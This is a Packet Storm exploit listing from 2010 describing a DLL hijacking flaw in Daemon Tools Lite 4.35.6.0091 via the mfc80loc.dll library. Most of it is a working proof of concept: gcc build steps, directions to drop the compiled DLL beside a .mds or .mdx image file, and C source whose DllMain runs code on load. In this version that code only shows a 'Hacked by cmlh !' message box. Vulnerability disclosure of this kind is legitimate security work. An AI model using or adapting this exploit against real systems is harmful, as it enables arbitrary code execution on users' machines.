Daemon Tools Lite 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit

2010-08-30T00:00:00
ID PACKETSTORM:93295
Type packetstorm
Reporter Christian Heinrich
Modified 2010-08-30T00:00:00

Description

                                        
                                            `/*  
  
Daemon Tools Lite <= 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit  
  
Found by: Christian Heinrich (cmlh)  
Exploit by: Christian Heinrich (cmlh)  
  
Email: christianheinrich@live.com  
Web: http://www.twitter.com/cmlh  
  
Summary: Daemon Tools is a disk image mounting application for Microsoft Windows.  
  
Description: Daemon Tools suffers from a dll hijacking vulnerability  
that enables the attacker to execute arbitrary code on a local  
level through the .MDS and .MDX extensions.  
  
----  
  
Howto:  
  
gcc -shared -o mfc80loc.dll daemontoolsexploit.c  
  
Compile this file and rename to mfc80loc.dll  
  
Then create an empty file named anything.msd or anything.mdx or you can create a  
a legitimate image.  
  
Double clicking the .mds/.mdx file with the mfc80loc.dll file in the same folder will execute  
our code.  
  
----  
  
Tested on Microsoft Windows 7 / XP sp 3  
  
Vulnerability discovered by Christian Heinrich (cmlh)  
  
  
christianheinrich@live.com  
  
27.08.2010  
  
*/  
  
  
#include <windows.h>  
  
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
{  
  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
dll_mll();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
  
return TRUE;  
}  
  
int dll_mll()  
{  
MessageBox(0, "Hacked by cmlh !", "DLL Message", MB_OK);  
}  
`